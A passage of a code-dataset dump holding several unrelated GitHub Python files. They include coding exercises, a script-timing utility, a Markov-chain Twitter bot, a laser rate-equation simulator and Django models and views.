begin_time = get.get_category_data(code, search_method)\n\n if CONFIG[\"write_html\"] or CONFIG[\"write_json\"]:\n utils.create_path(data[\"category_id\"])\n\n show.show_category_data(data, find_text)\n\n if CONFIG[\"write_json\"]:\n utils.write_json_file(data, json_file)\n\n utils.print_elapsed_time(begin_time)\n","repo_name":"myh2910/aops-tools","sub_path":"aops_tools/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2014,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"74287446246","text":"# 성적이 낮은 순서로 학생 출력하기\n\nn = int(input())\narr = []\n\nfor _ in range(n):\n data = input().split()\n arr.append((data[0], int(data[1])))\n\narr = sorted(arr, key=lambda x: x[1])\n\nfor i in range(len(arr)):\n print(arr[i][0], end=' ')","repo_name":"bluvory/Python_for_coding_test","sub_path":"ch06/6-11.py","file_name":"6-11.py","file_ext":"py","file_size_in_byte":252,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20306130817","text":"# Import plotting packages\nimport matplotlib.pyplot as plt\nfrom matplotlib import cm\nimport numpy as np\n# Import external classes\nimport graphBase as gb\nimport dectobase as db\n\n# Print user prompt\nprint(\"\\nWould you like to:\")\nprint(\"1. Graph the number of digits it takes to represent decimal number 'n' in base 2-36\")\nprint(\"2. Graph the number of digits it takes to represent decimal 1-100000 in base 'n'\")\n\n# Take user input\nwhile(1):\n try:\n print(\"Choice: \",end=\"\")\n userChoice = int(input())\n if(userChoice!=1 and userChoice!=2):\n raise\n break\n\n except:\n print(\"Invalid input, please try again\")\n \n \n# Graph varying bases\nif(userChoice == 1):\n\n # Take user input\n while(1):\n try:\n print(\"Enter the value you would like to plot: \",end=\"\")\n userValue = int(input())\n break\n except:\n print(\"Invalid input, please try again\")\n \n # Generate list of representations in base 2-36\n arr = db.dectobase(userValue)\n # Generate list of lengths of representations\n lengths = [len(i) for i in arr[0]]\n # X values for plotting\n xvals = [i+2 for i in range(len(lengths))]\n\n # Generate plot\n plt.step(range(len(lengths)),lengths)\n plt.plot(range(len(lengths)),lengths, 'o--', color='grey', alpha = 0.3)\n plt.ylabel(\"Number of digits\")\n plt.xlabel(\"Base\")\n plt.title(\"Number of digits to represent \"+str(userValue)+\" in base 2-36\")\n plt.show()\n\n# Graph varying numbers\nelif(userChoice == 2):\n\n # Take user input\n while(1):\n try:\n print(\"Enter the base you would like to plot: \",end=\"\")\n userValue = int(input())\n if(userValue<2 or userValue>36):\n raise\n break\n except:\n print(\"Invalid input, please try again\")\n \n \n # Generate input values for graphbase function\n inpvals = [(i*i) for i in range(1,100000)]\n arr = gb.graphBase(userValue, inpvals)\n\n # Generate plot\n fig,ax = plt.subplots()\n ax.set_xscale('log')\n ax.plot(inpvals, arr[0], '-', color='black')\n plt.ylabel(\"Number of digits\")\n plt.xlabel(\"Value\")\n plt.title(\"Number of digits to represent 1-1x10^11 in base \"+str(userValue))\n plt.show()\n","repo_name":"ziptol/discretefinal","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2314,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6916241495","text":"name = input(\"- Как тебя зовут?\\n- \")\n\nprint(\"Привет\", name)\n\nyear = input('Введи год тв��его рождения\\n- ')\n\nage = 2022 - int(year)\n\nif age < 12:\n print(\"Переходим в раздел товаров для детей\")\n\nelif age < 18:\n print(\"Переходим в раздел товаров для подростков\")\n\nelse:\n print(\"Переходим в основной раздел\")\n\n\n\n\n\n\n\n\n\n\n\n\n\n# try:\n# year = int(year)\n# except:\n# print(\"Неверный ввод\")\n# quit()\n\n# age = 2022 - year\n# print(age)\n\n# if age < 12:\n# print(\"Тебе меньше 12 лет. Переходим в раздел товаров для детей...\")\n\n# else:\n# print(\"Переходим к товарам для подростков...\")\n\n\n\n\n\n\n\n# Даны 2 целых числа a и b. Найди и выведи наибольшее из них.\n\n# a, b = 5, 10\n\n# if (a > b):\n# print(a)\n# elif (a < b):\n# print(b)\n# else:\n# print('Числа равны')\n\n\n# Даны 3 целых числа a, b и c. Найди и выведи количество отрицательных чисел.\n\n# a, b, c = -1, 3, -3\n\n\n# n = 0\n\n# if a < 0:\n# n = n + 1\n# if b < 0:\n# n = n + 1\n# if c < 0:\n# n = n + 1\n\n# print(\"Количество отрицательных чисел:\", n)\n\n\n# Дано целое число a. Если оно — чётное, то выведи 1, иначе — 0.\n\n# a = 101;\n\n# if a % 2 == 0:\n# print(1)\n# else: print(0)\n","repo_name":"aleksmn/PythonLessons","sub_path":"l-05.py","file_name":"l-05.py","file_ext":"py","file_size_in_byte":1548,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33437424927","text":"#!/usr/bin/env python3.6\n\"\"\"Record statistics on execution time a folder full of executables.\"\"\"\nfrom timeit import timeit\nfrom subprocess import run, PIPE, CompletedProcess\nfrom typing import Optional, Dict, List\nfrom json import loads, dumps\nfrom os import listdir, access\nfrom os.path import basename, join\nfrom os import X_OK as as_executable_file\nfrom strict_hint import strict\nfrom logging import getLogger, DEBUG\nfrom logging.config import dictConfig\n\n\nclass TimeCommands:\n \"\"\"TimeCommands in a specified folder.\"\"\"\n\n @strict\n def __init__(self,\n parent_dir: str,\n iterations: int = 1000,\n rate_limited: List[str] = []\n ):\n \"\"\"The main entrypoint of the script.\"\"\"\n # Logging config and initialization.\n dictConfig({\n \"version\": 1,\n \"formatters\": {\n \"brief\": {\n 'format':\n \"%(levelname)s [%(asctime)s] %(filename)s@%(lineno)s:\"\n + \" %(message)s\"\n },\n \"friendly\": {\n 'format':\n \"In %(filename)s, at line %(lineno)s, a message was\"\n + \" logged. Message follows:\\n\\t%(message)s\\nThis\"\n + \" message was logged by the function %(funcName)s,\"\n + \" with\\n%(levelname)s(%(levelno)s) severity,\"\n + \" at %(asctime)s.\"\n }\n },\n \"handlers\": {\n \"testhandler\": {\n \"class\": \"logging.StreamHandler\",\n \"formatter\": \"brief\",\n \"level\": DEBUG\n }\n },\n \"root\": {\n \"handlers\": [\"testhandler\"],\n \"level\": DEBUG\n }\n })\n self.log = getLogger()\n self.parent_dir = parent_dir\n self.iterations = iterations\n self.rate_limited_commands = rate_limited\n self.rate_limited_iterations = 3\n self.times = self.get_existing_stats()\n self.baseline('before')\n self.time_all()\n self.baseline('after')\n self.write_results()\n\n def write_results(self):\n \"\"\"Write the results of the tests to stats.json for later review.\"\"\"\n with open('stats.json', mode='w') as stats:\n stats.write(dumps(self.times, indent=2) + '\\n')\n\n @strict\n def baseline(self, prefix: str):\n \"\"\"A baseline amount of time running any command will take.\"\"\"\n if f'baseline {prefix}' in self.times.keys():\n self.times[f'baseline {prefix}'].append(self.timecmd(\"true\"))\n else:\n self.times[f'baseline {prefix}'] = [self.timecmd(\"true\")]\n\n @strict\n def add_new_time_for(self, command: str, time: float):\n \"\"\"Check for the command in the times dict and append time to it.\"\"\"\n self.log.info(f\"Storing time {time} for command {command}.\")\n if command in self.times.keys():\n self.times[command].append(time)\n else:\n self.times[command] = [time]\n\n def time_all(self):\n \"\"\"Run timecmd() on each command in self.parent_dir.\"\"\"\n for fn in listdir(self.parent_dir):\n self.log.debug(f\"Checking file {fn}...\")\n if access(join(self.parent_dir, fn), as_executable_file):\n self.log.info(\n f\"...{fn} is executable\\nTiming command {fn}.\"\n )\n if fn == \"iface\":\n self.add_new_time_for(\n 'iface',\n self.timecmd(\n \"BLOCK_INSTANCE=enp4s9\"\n + join(self.parent_dir, fn)\n )\n )\n # NOTE: Any scripts which require params or envvars should\n # intercept here\n if fn in self.rate_limited_commands:\n self.add_new_time_for(\n fn,\n self.timecmd(\n join(self.parent_dir, fn),\n self.rate_limited_iterations\n )\n )\n else:\n self.add_new_time_for(\n fn, self.timecmd(join(self.parent_dir, fn))\n )\n else:\n self.log.info(f\"...{fn} is not executable. Skipping.\")\n\n @strict\n def timecmd(self, cmd: str, number_of_exec: int = 0) -> float:\n \"\"\"Create a function for a shell command and time it.\"\"\"\n def cmd2():\n self.runcmd(cmd)\n if not number_of_exec:\n number_of_exec = self.iterations\n return timeit(cmd2, number=number_of_exec) / number_of_exec\n\n @staticmethod\n @strict\n def runcmd(cmd: str, to_stdin: Optional[str] = None) -> CompletedProcess:\n \"\"\"Run a command with default settings.\"\"\"\n return run(cmd, shell=True, check=True, stdout=PIPE, input=to_stdin)\n\n @strict\n def get_existing_stats(self) -> Dict[str, List[float]]:\n \"\"\"Retrieve any existing statistics from stats.json.\"\"\"\n try:\n with open(\"stats.json\") as stats:\n return loads(stats.read())\n except FileNotFoundError:\n return {fn: [] for fn in listdir(self.parent_dir)}\n\n\nclass TimeI3BlocksScripts(TimeCommands):\n \"\"\"Time the scripts stored at /home/scott/.i3/blocks/.\"\"\"\n\n def __init__(self):\n \"\"\"Initialize stuff specific to this folder, then pass to super.\"\"\"\n parent_dir = \"/home/scott/.i3/blocks\"\n super().__init__(parent_dir=parent_dir, rate_limited=[\n 'public_ip',\n 'weather'\n ])\n\n\nTimeI3BlocksScripts()\n","repo_name":"dscottboggs/time_scripts","sub_path":"time_scripts.py","file_name":"time_scripts.py","file_ext":"py","file_size_in_byte":5777,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34055032789","text":"\nimport markovify\nimport tweepy\nimport os\n\nfrom random import randint\nfrom time import sleep\n\n\n\noldtext = []\nback = []\nbacktext = []\n\nclass TwitterAPI:\n def __init__(self, botfood):\n self.load_botfood(botfood)\n\n consumer_key = os.environ.get(\"consumer_key1\")\n consumer_secret = os.environ.get(\"consumer_secret1\")\n auth = tweepy.OAuthHandler(consumer_key, consumer_secret)\n access_token = os.environ.get(\"access_token1\")\n access_token_secret = os.environ.get(\"access_token_secret1\")\n auth.set_access_token(access_token, access_token_secret)\n self.api = tweepy.API(auth)\n\n def load_botfood(self, botfood):\n with open (botfood) as botfood:\n botfood = botfood.read()\n self.model = markovify.Text(botfood)\n print(self.model)\n\n def backlog(self):\n public_tweets = self.api.home_timeline()\n for tweet in public_tweets:\n if tweet.user.screen_name != \"tmrdrr\":\n backtext.insert(0, tweet.text)\n if tweet.user.screen_name not in back:\n toReply = tweet.user.screen_name\n self.tweet(toReply)\n back.insert(0, tweet.user.screen_name)\n\n def follow(self):\n for follower in tweepy.Cursor(self.api.followers).items():\n follower.follow()\n print (follower.screen_name)\n\n\n\n def timeline(self):\n public_tweets = self.api.home_timeline()\n with open (\"botfood.txt\", \"r\") as botfood_file:\n botfood = botfood_file.read()\n model = markovify.Text(botfood)\n # print(public_tweets)\n with open (\"botfood.txt\", \"a\") as botfood_file:\n for tweet in public_tweets:\n if tweet.user.screen_name != \"tmrdrr\":\n if tweet.text not in oldtext:\n if tweet.text not in backtext:\n if \"tmrdrr\" in tweet.text.lower():\n toReply = tweet.user.screen_name\n self.tweet(toReply)\n oldtext.insert(0, tweet.text)\n tobeinserted = tweet.text\n tobeinserted = tobeinserted.split(' ', 1)[1]\n botfood_file.write(tobeinserted + \"\\n\")\n\n # print(oldtext)\n if len(oldtext) > 15:\n oldtext.pop()\n\n # def search(self):\n # message = self.model.make_short_sentence(120)\n # for tweet in self.api.search(q=\"tmrdrr\"):\n # if \"tmrdrr\" in tweet.text.lower():\n # toReply = tweet.user.screen_name\n # self.tweet(toReply)\n\n\n\n\n\n def tweet(self, toReply):\n message = self.model.make_short_sentence(120)\n messageTwo = self.model.make_short_sentence(140)\n self.api.update_status(\"@\" + toReply + \" \" + message)\n self.api.update_status(messageTwo)\n\n\n\n\n\n def automate(self, delay):\n while True:\n self.timeline()\n\n sleep(delay)\n\n\ndef main():\n twitter = TwitterAPI(\"botfood.txt\")\n twitter.backlog()\n twitter.follow()\n twitter.automate(185)\n\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"tmrdr/mrdrbotsite","sub_path":"mrdrbot.py","file_name":"mrdrbot.py","file_ext":"py","file_size_in_byte":3373,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28562851721","text":"from extract import extract_csv\nimport pandas as pd\n\npd.options.display.max_columns = None\n\ndef transform_data():\n \"\"\" This function transforms and cleans the Dataframe data \"\"\"\n\n data_df = extract_csv()\n\n #Removing PACKAGE_ID column because all it's values are null\n data_df = data_df.drop('PACKAGE_ID', axis=1)\n\n #Removing duplicates in CDR_ID and ICCID\n data_df = data_df.drop_duplicates(subset=['CDR_ID','ICCID'])\n\n #Converting columns to datetime\n data_df['CONNECT_TIME'] = pd.to_datetime(data_df['CONNECT_TIME'])\n data_df['CLOSE_TIME'] = pd.to_datetime(data_df['CLOSE_TIME'])\n\n data_df['COMPANY_NAME'] = data_df['COMPANY_NAME'].replace('Ubicate GPS', 'CLIENTE E')\n\n #Lowercase all columns\n data_df.columns = map(str.lower, data_df.columns)\n data_df = data_df.rename(columns={'iccid':'icc_id'})\n\n return data_df\n","repo_name":"Dantergy/etl_communications","sub_path":"tranform.py","file_name":"tranform.py","file_ext":"py","file_size_in_byte":859,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16923668324","text":"'''\r\n###############################################################################\r\n########### Program to simulate laser-rate equations in Python ################\r\n########################## Niall Boohan 2020 ##################################\r\n###################### niall.boohan@tyndall.ie ################################\r\n###############################################################################\r\n\r\nBASED ON:\r\nTheory and equations sourced from:\r\nTitle: Diode Lasers and Photonic Integrated Circuits\r\nAuthor: Coldren, Larry A.\r\nYear: 1997\r\nCompensation values from:\r\nTitle: Comparison of rate-equation and Fabry-Perot approaches to modeling a\r\n diode laser\r\nAuthor: Daniel T. Cassidy\r\nYear: 1983\r\n-------------------------------------------------------------------------------\r\nNOTES:\r\n-Multimode calculation based on https://en.wikipedia.org/wiki/\r\n Laser_diode_rate_equations\r\n-Radiative and non-radiative recombination Schubert, E. Fred\r\n'''\r\n\r\n# Import necessary libraries ###\r\nfrom scipy.integrate import ode\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport time\r\nimport multiprocessing as mp\r\nimport functools as fn\r\n\r\n# Import parameters ###\r\nfrom fileinput import CUR, cur_sweep_mA, AL_CAV, LAM0, GAM, A, B, C, cl_cm,\\\r\n DG, EPS, M, q, vol_cm, vol_nm, vg_cm, f_Hz, r_l, r_r, IND_RID, D_IND, c, al_t, R_SP\r\n\r\n# Import functions ###\r\nfrom fileinput import p_mW, p_dBm, tp_m\r\n\r\n###############################################################################\r\n# Dashboard\r\n###############################################################################\r\n# Settings ###\r\nMM = 1 # 0 single mode, 1 multiple modes\r\nLI = 0 # Turn on LI sweep\r\nMODE_CALC = 10 # Sets number of modes to run calc over \r\n\r\n# Time contraints and initial conditions ###\r\nT1 = 5e-9 # Time to run calc for (s)\r\nDT = 1e-16 # Time step for calc (s)\r\nS0 = 0 # Initial photon conc (cm^-3)\r\nN0 = 1e16 # Initial carrier conc (cm^-3)\r\n\r\n# Multiprocessing settings ###\r\nNUM_PROC = 6\r\np = mp.Pool(NUM_PROC)\r\n\r\n###############################################################################\r\n# Pre-calculations\r\n###############################################################################\r\n# Convertions to specific value ranges for this code ###\r\ncur = CUR/1e3\r\ncur_sweep_A = [i/1e3 for i in cur_sweep_mA]\r\n\r\n# Single-mode operation values ###\r\nif MM == 0:\r\n g_m = np.array([al_t])\r\n m0 = 0 # Manually set m0 for single mode simulation\r\n wl_m = [LAM0]\r\n print('lam0=', LAM0, 'm')\r\n print('Gain m0 [Total loss]', al_t, 'cm^-1')\r\n\r\n\r\n# Read in modal gain ###\r\nif MM == 1:\r\n inp = np.load('INV_TMM.npz')\r\n wl_m = inp['WL']\r\n g_m = inp['gain'] # Import gain in cm^-1\r\n m0 = int(np.ceil(len(g_m)/2))\r\n wl_m0 = wl_m[m0]\r\n d_wl = abs(np.average([wl_m[i]-wl_m[i-1] for i in range(1, len(wl_m))]))\r\n g_band = d_wl*M # Gain band FWHM (nm)\r\n # Set limit on modes in file to run calc over\r\n g_m = g_m[m0-MODE_CALC:m0+MODE_CALC]\r\n wl_m = wl_m[m0-MODE_CALC:m0+MODE_CALC]\r\n m0 = int(np.ceil(len(g_m)/2)) # Reset m0\r\n\r\n# Simulation inputs/outputs ###\r\nT = [] # Time vector\r\ny0 = [N0] # Initial conds [N]\r\nfor i in range(len(g_m)+1): # Add initial S for each mode\r\n y0.append(S0)\r\nprint(\"m0 = \", m0)\r\n\r\n###############################################################################\r\n# Main function definition\r\n###############################################################################\r\ndef solver(y, cur): # Input current & init conds\r\n\r\n out = [] # Holder for all simulation outputs\r\n p = [cur, q, vol_cm, vg_cm, GAM] # Parameters for odes\r\n\r\n # Setup integrator with desired parameters ###\r\n r = ode(laser_rates).set_integrator('dopri5', nsteps = 1e6)\r\n r.set_f_params(p).set_initial_value(y, 0)\r\n\r\n # Simulation run & check ###\r\n while r.successful() and r.t+DT < T1:\r\n r.integrate(r.t + DT)\r\n out.append(r.y) # Makes a list of 1d arrays\r\n T.append(r.t)\r\n\r\n out = np.array(out) # Convert from list to 2d array\r\n\r\n return out\r\n\r\n\r\n\r\n# Define equations to be solved ###\r\ndef laser_rates(t, y, p):\r\n\r\n # Generate outputs for each mode ###\r\n dy = np.zeros([len(g_m)+2])\r\n\r\n # Carrier equation ###\r\n dy[0] = p[0]/(q*vol_cm) - coeff_gain(y[0], y[1], 0)*y[1]*vg_cm - tn(y[0])\r\n # Total carrier conc calc ###\r\n y[1] = sum([y[i] for i in range(2, len(dy))]) # Total stim emission\r\n # Calculation for each independent mode ###\r\n for i in range(len(g_m)):\r\n dy[i+2] = (GAM*coeff_gain(y[0], y[i], i)*vg_cm - 1/tp_m(g_m[i]))*y[i+2]\\\r\n + GAM*R_SP\r\n #dy[i+2] = (GAM*coeff_gain(y[0], y[i], i)*vg_cm - 1/tp_m(g_m[i]))*y[i+2]\\\r\n #+ GAM*spont(y[0], wl_m[i])\r\n\r\n # Display outputs of each mode ###\r\n #print(y)\r\n\r\n return dy\r\n\r\n\r\n###############################################################################\r\n# Supplementary definitions\r\n###############################################################################\r\n# Group index ###\r\ndef n_g(wl):\r\n x = IND_RID-(LAM0-wl)*D_IND\r\n #print('Group refractive index', x)\r\n return x\r\n\r\n\r\n# Carrier decay rate (tn) removed above threshold ###\r\ndef tn(n):\r\n x = A*n + B*(n**2) + C*(n**3)\r\n y = x*n \r\n y = \"{:e}\".format(y)\r\n #print('Carrier Recomb', y, 'ps^-1')\r\n return x\r\n\r\n\r\n# Gain log calc p277 C&C, compensated for cavity ###\r\ndef coeff_gain(n, s, itr): # s is modal total for photon conc\r\n x = (r_l*r_r)*(DG*n)*(1/(1+abs(itr-m0)/M**2))*(1/(1+EPS*s))\r\n y = \"{:e}\".format(x)\r\n #print('Gain Factor', x,'cm^-1')\r\n return x\r\n\r\n\r\ndef spont_band(wl):\r\n x = 1/(1+(2*abs(LAM0-wl)/g_band)**2)\r\n y = \"{:e}\".format(x)\r\n #print('Spontaneous Band Factor', y)\r\n return x\r\n\r\n# Coldren & Corzine appendix calculation laser-rate wiki spont factor ###\r\ndef beta_sp(wl):\r\n x = (2/np.pi)*GAM*(wl**4)/(8*np.pi*vol_nm*(IND_RID**2)*n_g(wl)*g_band)#\\*spont_band(wl)\r\n #x = 1e-3\r\n #y = \"{:e}\".format(x)\r\n #print('Spontaneous emission factor', y)\r\n return x\r\n\r\n# Approximation from Cassidy [1983] cavity amplification ###\r\ndef spont(n, wl):\r\n x = n*beta_sp(wl)*(1+(AL_CAV*cl_cm)/2)\r\n #y = \"{:e}\".format(x)\r\n #print('Spontaneous emission rate', y)\r\n return x\r\n\r\n###############################################################################\r\n# Plotting function definitions\r\n###############################################################################\r\n# Takes in Y array & returns desired data ###\r\ndef proc_li(y):\r\n y = np.array(y)\r\n col = [y[i][-1] for i in range(len(y))]\r\n car_conc = [col[i][0] for i in range(len(col))]\r\n pow_t = [p_mW(col[i][1]) for i in range(len(col))]\r\n pow_m = [p_mW(col[i][2:]) for i in range(len(col))]\r\n\r\n return pow_tot, pow_m\r\n\r\n\r\n# Takes in Y array & returns desired data for dynamic calc ###\r\ndef proc_dynam_mm(y):\r\n y = np.array(y)\r\n car_conc = y[:, 0]\r\n pow_tot = p_mW(y[:, 1])\r\n pow_m = p_mW(y[:, 2:])\r\n pow_0 = p_mW(y[:, m0+1])\r\n y_end = y[-1, 1:]\r\n\r\n return car_conc, pow_tot, pow_m, pow_0, y_end\r\n\r\n\r\n# Dynamic plotting ###\r\ndef plot_dynam_s(car_conc, phot_conc):\r\n\r\n f, axarr = plt.subplots(2, sharex=True) # Two subplots\r\n axarr[0].plot(T, car_conc, 'g')\r\n axarr[0].set_ylabel(\"Carrier Conc ($cm^{-3}$)\")\r\n axarr[0].set_title('Laser-Rate Simulation')\r\n axarr[1].plot(T, phot_conc, 'b')\r\n axarr[1].set_ylabel(\"Modal Power (mW)\")\r\n axarr[1].set_xlabel(\"Time (s)\")\r\n plt.show()\r\n\r\n return\r\n\r\n\r\n# Dynamic plotting ###\r\ndef plot_dynam_mm(pow_m):\r\n plt.plot(T, pow_m)\r\n plt.ylabel(\"Power (mW)\")\r\n plt.title('Laser-Rate Simulation')\r\n #plt.ylim(0, 3e16)\r\n plt.xlabel(\"Time (s)\")\r\n plt.show()\r\n\r\n return\r\n\r\n\r\n# Dynamic plotting ###\r\ndef smsr(pow_m):\r\n\r\n print(pow_m)\r\n # Steady-state SMSR ###\r\n plt.plot(wl_m, p_dBm(pow_m[-1]), '-*')\r\n plt.xlabel('WL (nm)')\r\n plt.ylabel('Power (dBm)')\r\n plt.title('Spectrum')\r\n plt.show()\r\n\r\n # Dynamic SMSR ###\r\n max_val = max(pow_m[-1])\r\n max_index = np.where(pow_m == max_val)\r\n sort = np.sort(pow_m[-1])\r\n val = sort[-2]\r\n ind = np.where(pow_m[-1]==val)\r\n pow_0 = [pow_m[i][m0] for i in range(len(T))]\r\n pow_nn = [pow_m[i][m0+1] for i in range(len(T))]\r\n pow_band = [pow_m[i][ind] for i in range(len(T))]\r\n smsr_nn = [p_dBm(pow_nn[i]) - p_dBm(pow_0[i]) for i in range(len(T))]\r\n smsr = [p_dBm(pow_band[i]) - p_dBm(pow_0[i]) for i in range(len(T))]\r\n plt.plot(T, smsr_nn, label='Nearest Neighbour')\r\n plt.plot(T, smsr, label='Across Band')\r\n plt.ylabel(\"Supression (dB)\")\r\n plt.title('Dynamic SMSR')\r\n plt.xlabel(\"Time (s)\")\r\n plt.legend()\r\n plt.show()\r\n\r\n return\r\n\r\n\r\ndef plot_li_s(pow_tot, pow_m):\r\n\r\n # Post solver calculations\r\n qe = [i/j for i, j in zip(pow_tot, cur_sweep_mA)] # Convert to QE\r\n\r\n # Plotting two parameters on one plot ###\r\n fig, ax1 = plt.subplots()\r\n ax2 = ax1.twinx()\r\n ax1.plot(cur_sweep_mA, pow_tot, 'g-')\r\n ax2.plot(cur_sweep_mA, qe, 'b-')\r\n ax1.set_xlabel('Current (mA)')\r\n ax1.set_ylabel('Power (mW)', color='g')\r\n ax2.set_ylabel('Quantum Efficiency', color='b')\r\n plt.title(\"Single Mode LI\")\r\n plt.show()\r\n\r\n plt.plot(cur_sweep_mA, pow_m)\r\n plt.title('Multimode LI')\r\n plt.xlabel('Current (mA)')\r\n plt.ylabel('Power (mW)')\r\n plt.show()\r\n\r\n return\r\n\r\n\r\n###############################################################################\r\n# Main section to call functions\r\n###############################################################################\r\nif __name__ == '__main__':\r\n tic = time.perf_counter()\r\n # Dynamic single mode ###\r\n if MM == 0 and LI == 0:\r\n res = solver(y0, CUR)\r\n n, pow_tot, pow_m, pow_0, y_end = proc_dynam_mm(res)\r\n toc = time.perf_counter()\r\n print(f\"The code executed in {toc - tic:0.4f} seconds\")\r\n plot_dynam_s(n, pow_0)\r\n\r\n # Dynamic multi-mode ###\r\n if MM == 1 and LI == 0:\r\n res = solver(y0, cur)\r\n #res = p.map(solver, y0, CUR)\r\n toc = time.perf_counter()\r\n print(f\"The code executed in {toc - tic:0.4f} seconds\")\r\n n, pow_tot, pow_m, pow_0, y_end = proc_dynam_mm(res)\r\n plot_dynam_mm(pow_m)\r\n smsr(pow_m)\r\n \r\n # Relaunch calc again at ss to extract LW data\r\n y_end[0] = n[-1]+n[-1]/10 # 10% modulation applied\r\n y_end = y_end.tolist()\r\n y_end.insert(1, 0) # Inset initial carrier conc\r\n T.clear() # Empty time list to reuse\r\n res = solver(y_end, cur)\r\n n, pow_tot, pow_m, pow_0, y_end = proc_dynam_mm(res)\r\n np.savez('Rate_out.npz', T, n, pow_0)\r\n \r\n # Steady-state single-mode LI ###\r\n if LI == 1:\r\n res = p.map(fn.partial(solver, y0), cur_sweep_A)\r\n m0, m = proc_li(res)\r\n toc = time.perf_counter()\r\n print(f\"The code executed in {toc - tic:0.4f} seconds\")\r\n plot_li_s(m0, m)\r\n","repo_name":"boohann/SFP_modelling_pubilc","sub_path":"rate_eqns.py","file_name":"rate_eqns.py","file_ext":"py","file_size_in_byte":11289,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"38791337311","text":"from django.contrib.auth.models import AbstractUser\nfrom django.contrib.auth.models import Group as BaseGroup\nfrom django.db import models\n\n\nclass Group(BaseGroup):\n\n class Meta:\n verbose_name = 'Группа'\n verbose_name_plural = 'Группы'\n proxy = True\n\n\nclass User(AbstractUser):\n\n USER = 'user'\n MODERATOR = 'moderator'\n ADMIN = 'admin'\n ROLE_CHOICES = [\n (USER, 'Пользователь'),\n (MODERATOR, 'Модератор'),\n (ADMIN, 'Администратор')\n ]\n\n email = models.EmailField(unique=True, verbose_name='Email')\n first_name = models.CharField(\n max_length=150, blank=True, verbose_name='Имя'\n )\n bio = models.TextField(blank=True, verbose_name='О себе')\n role = models.CharField(\n max_length=30, choices=ROLE_CHOICES, default=USER, verbose_name='Роль'\n )\n confirmation_code = models.TextField(\n null=True, verbose_name='Код подтверждения'\n )\n\n class Meta:\n verbose_name = 'Пользователь'\n verbose_name_plural = 'Пользователи'\n\n def __str__(self):\n return self.username\n\n def save(self, *args, **kwargs):\n if self.role:\n if self.role == self.ADMIN:\n self.is_superuser = True\n self.is_staff = True\n if self.role == self.MODERATOR:\n self.is_staff = True\n return super(User, self).save(*args, **kwargs)\n if self.is_superuser:\n self.role = self.ADMIN\n elif self.is_staff:\n self.role = self.MODERATOR\n else:\n self.role = self.USER\n return super(User, self).save(*args, **kwargs)\n\n @property\n def is_admin(self):\n return self.role == 'admin'\n","repo_name":"Alexey-Bormotov/api_yamdb","sub_path":"api_yamdb/users/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1812,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"24343906827","text":"from django.shortcuts import render, redirect\nfrom django.contrib.auth.decorators import login_required\nfrom django.shortcuts import get_object_or_404, render\nfrom core.decorators import miiowner_required, agreed_terms_required\nfrom core.models import User, Pets, SitterServices, ServicePhotos, MiiSitter\nfrom core.models import ServiceBooking, ServiceLocation, ServiceReviews\nfrom django.views.generic import ListView\nfrom django.db.models import Q, Sum\nfrom core.methods import sort_out_dates, filter_on_location, return_day_of_week_from_date, generate_review_html_start\nfrom core.methods import get_options_of_timeslots_walk_sit, get_options_of_timeslots_board_daycare\nfrom .forms import BookService\nfrom django.template.loader import render_to_string\nfrom django.utils.html import strip_tags\nfrom django.core import mail\nfrom django.conf import settings\nfrom datetime import datetime, timedelta, timezone\nfrom django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\n\n\ndef view_all_services(request):\n \"\"\"\n This view allows everyone to view all current services\n \"\"\"\n try:\n if request.user.is_sitter:\n context = {\n \"title\": \"All Services\",\n \"sitter_user\":True\n }\n else:\n context = {\n \"title\": \"All Services\",\n \"sitter_user\":False\n }\n except:\n context = {\n \"title\": \"All Services\",\n \"sitter_user\":False\n }\n\n return render(request, 'services/all-services.html', context)\n\n\ndef view_services(request, type):\n \"\"\"\n This view allows everyone to view all current Services\n \"\"\"\n\n # get all services with type requested\n type_dictionary = {\"Walker\":\"WALK\",\n 'Boarding' :'BOARD',\n 'Sitter' :'SIT',\n 'Daycare' :'DAYCARE'}\n\n if request.method==\"GET\":\n #check if type correct for filtering\n try:\n if request.GET['service_type_input'] in type_dictionary.keys():\n type = [type_dictionary[request.GET['service_type_input']]]\n else:\n type = list(type_dictionary.values())\n except:\n try:\n type = [type_dictionary[type]]\n except:\n type = [type]\n\n #check if dates are correct\n try:\n start_date, end_date = sort_out_dates(request.GET['date_begin_input'],\n request.GET['date_end_input'])\n except:\n start_date, end_date = sort_out_dates('', '')\n\n\n try:\n price_start = request.GET['price_start']\n if price_start == \"\":\n price_start = 0\n except:\n price_start = 0\n\n try:\n price_end = request.GET['price_end']\n if price_end == \"\":\n price_end = 500\n except:\n price_end = 500\n\n price_start = int(price_start)\n price_end = int(price_end)\n\n if price_start> price_end:\n price_start, price_end = price_end, price_start\n\n\n # checking for pet type\n try:\n pet_type = request.GET['pet_type']\n except:\n pet_type = \"All Pets\"\n\n try:\n review_score = request.GET['review_score']\n if review_score == \"Review score\":\n review_score = -1\n else:\n review_score = int(review_score[0])\n\n except:\n review_score = -1\n\n #get relevant services not based on location\n if pet_type == \"All Pets\":\n services = SitterServices.objects.filter(Q(type__in=type)&\n Q(allowed_to_show=True)&\n Q(date_start__lte=start_date)&\n Q(date_end__gte=end_date)&\n Q(price__range=[price_start, price_end])&\n Q(review_score__gte=review_score))\n\n elif pet_type == \"Dog\":\n services = SitterServices.objects.filter(Q(type__in=type)&\n 